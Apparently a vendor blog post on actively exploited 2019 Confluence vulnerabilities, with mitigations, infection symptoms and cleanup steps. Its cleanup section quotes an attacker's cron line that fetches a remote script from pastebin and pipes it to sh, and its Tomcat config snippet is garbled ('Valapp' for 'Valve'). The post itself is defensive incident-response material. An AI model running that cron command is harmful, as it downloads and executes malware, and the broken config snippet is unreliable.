Vulnerabilities in Atlassian Confluence are now being actively exploited by hackers

nw - 5 min read

In March, Atlassian announced that the Confluence software (Server and Data Center) contains two critical vulnerabilities, namely the apps WebDAV and Widget Connector. Now, on 17 April, another vulnerability was discovered.  

Unfortunately, many other solution partners and also we noticed that in the last few days exactly these vulnerabilities were increasingly exploited by hackers to attack publicly accessible Confluence instances. In order to protect yourself from attacks of this kind, Atlassian recommends upgrading to the latest Confluence version.

The following section provides more detailed information about the impact of these security vulnerabilities and how you can recover from such attacks.

About the security vulnerabilities

WebDAV vulnerability - CVE-2019-3395

Severity

Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low.

This is our assessment and you should evaluate its applicability to your own IT environment.

Description

Confluence Server and Data Center versions released before the 18th June 2018 are vulnerable to this issue. A remote attacker is able to exploit a Server-Side Request Forgery (SSRF) vulnerability in the WebDAV plugin to send arbitrary HTTP and WebDAV requests from a Confluence Server or Data Center instance.

All versions of Confluence Server and Confluence Data Center before version 6.6.7, from version 6.7.0 before 6.8.5 (the fixed version for 6.8.x), from version 6.9.0 before 6.9.3 (the fixed version for 6.9.x). 

Widget Connector vulnerability - CVE-2019-3396

Severity

Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low.

This is our assessment and you should evaluate its applicability to your own IT environment.

Description

There was an server-side template injection vulnerability in Confluence Server and Data Center, in the Widget Connector. An attacker is able to exploit this issue to achieve server-side template injection, path traversal and remote code execution on systems that run a vulnerable version of Confluence Server or Data Center.

All versions of Confluence Server and Confluence Data Center before version 6.6.12, from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x) and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x). 

Path traversal in the downloadallattachments resource - CVE-2019-3398

Severity 

Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low.

This is our assessment and you should evaluate its applicability to your own IT environment.

Description

Confluence Server and Data Center had a path traversal vulnerability in the downloadallattachments resource. A remote attacker who has permission to add attachments to pages and / or blogs, or to create a new space or personal space, or who has 'Admin' permissions for a space, can exploit this path traversal vulnerability to write files to arbitrary locations which can lead to remote code execution on systems that run a vulnerable version of Confluence Server or Data Center.

All versions of Confluence Server from 2.0.0 before 6.6.13 (the fixed version for 6.6.x), from 6.7.0 before 6.12.4 (the fixed version for 6.12.x), from 6.13.0 before 6.13.4 (the fixed version for 6.13.x), from 6.14.0 before 6.14.3 (the fixed version for 6.14.x), and from 6.15.0 before 6.15.2 are affected by this vulnerability.  

More Details: https://confluence.atlassian.com/doc/confluence-security-advisory-2019-04-17-968660855.html

Secure your instance!

First of all: Please make sure to upgrade your Confluence instance to the latest version! This is the best way to protect yourself from these kind of cyber attacks.

If you have chosen an enterprise version of Confluence, you only need to select the last minor update. If you do not have an enterprise version and do not have either of the last two versions, you will have to upgrade to the latest version.

If this is not possible due to other reasons, you need to secure your instance ASAP. Here is how to proceed:

Mitigation for CVE-2019-3396

If you unable to update Confluence immediately, you can switch to the following link as a temporary workaround.  Settings > Manage apps / add-ons select System, and disable the following system plugins in Confluence:

If you disable the Widget Connector plugin, the Widget Connector macro will not be available anymore. This macro is used to display content from websites like YouTube, Vimeo, and Twitter. Users will see an 'unknown macro' error.

If you disable the WebDAV plugin, you will not be able to connect to Confluence using a WebDAV client. Disabling this plugin will also automatically disable the Office Connector plugin, which means Office Connector features, such as "Import from Word" and "Edit in Office" are no longer available. Please be aware that since WebDAV is not required to edit files from Confluence 6.11 and later, it is still possible to edit files in these versions.

After upgrading, you will need to manually re-enable:

  • WebDAV plugin
  • Widget Connector
  • WebDAV plugin
  • Widget Connector
  • Office Connector.

Mitigation for CVE-2019-3398

If you are unable to upgrade Confluence immediately, as a temporary workaround, you should block the affected URL <base-url>/<context-path>/pages/downloadallattachments.action . Disabling this URL will prevent anyone downloading all attachments via the attachments page or the attachments macro. Downloading individual attachments will continue tol work.

To block the URL directly in Tomcat:

  1. Stop Confluence.
  2. Edit <install-directory>/conf/server.xml.
  3. Add the following inside the <Host> element:<Context path="/pages/downloadallattachments.action" docBase="" > <Valapp className="org.apache.catalina.valapps.RemoteAddrValapp" deny="*" /> </Context>If you run Confluence with a context path, for example /wiki, you will need to include your context path in the path, as shown here:<Context path="/wiki/pages/downloadallattachments.action" docBase="" > <Valapp className="org.apache.catalina.valapps.RemoteAddrValapp" deny="*" /> </Context>
  4. Save the file, and restart Confluence.

To verify that the workaround was applied correctly:

  1. Navigate to a page or blog that has 2 or more attachments.
  2. Go to  > Attachments and then select Download all attachments.

You should see a 404 error and no files should be downloaded.

Already infected?

We are currently aware of the following effects caused by exploiting the security vulnerabilities:

  1. The instance is unreachable
  2. Unable to start the instance → process will be killed after a few seconds
  3. Heavy CPU load of processed data executed by the Confluence user in peculiar process such as (sshd, khugepaged, vmlinuz)

If your instance shows these or similar symptoms, you may also have been attacked and exploited by this malware. Currently we observed this type of malware attack on Linux systems only. Different files will be created within the /tmp folder. One of these files is called seasame (Located in /tmp/seasame), which is the malware itself. This basically means, that the malware attempts to install itself as a service, register a cronjob and run the maleware itself. This description is based on our current analyses but there may be various other variants out there to exploit the security vulnerabilities.

How to resolve this issue if you are affected?

The following step is a workaround. You should install a new server and just copy the database and the folder Confluence-data. If this is currently not possible, try the following:

  1. Kill the processes
  2. Clean /tmp folder e.g. rm -Rf /tmp/*
  3. (Optional) Delete the Confluence user (This will prevent the malware to be executed)
  4. Check cronjobs for the malware (In addition you might want to check for a modified noop.jsp)There might be en entry like this:```*/15 * * * * (curl -fsSL https://pastebin.com/raw/wR3ETdbi%7C%7Cwget -q -O- https://pastebin.com/raw/wR3ETdbi)|sh```
  5. Install the latest version of Confluence
  6. (Optional) If the Confluence user was deleted in step 3, create a new one with a different name.

Please feel free to contact venITure, if you have any questions regarding this issue or if you need any type of technical support in this matter. (service@venITure.net or +49 221 985 9240)

You might also be interested in the following

Mit unserem Blog halten wir Sie immer up-to-date und informieren Sie über die neusten Entwicklungen im Bereich Atlassian Tools
und Infobip Lösungen.
venITure is Marketing Innovator 2020

We are delighted to announce that we have been awarded Atlassian Partner of the Year for a second time within the event Atlassian Team 2021. We also congratulate all the other winners of the year and are very pleased that such great achievements were reached in such diverse categories! Here's a little insight into how the award […]

Atlassian Update: Data residency on Jira and Confluence for Standard and Premium

In Europe, we place great emphasis on protecting our data: We know that control over where data is hosted is a prerequisite for our customers - no matter what size - to adopt Atlassian Cloud products. We have received this feedback time and time again from many customers. So, at this point, we're very pleased […]

venITure is Top Vendor for Apps in the Atlassian Marketplace

We are pleased to announce that venITure has been officially listed as a Top Vendor in the Atlassian marketplace. What exactly does "Top Vendor" mean? According to Atlassian, "Top Vendor" solution partners excel in performance and commitment by providing exemplary app quality, reliability and customer support. As a representative tool, these vendors are awarded the […]

Contact us

crossmenu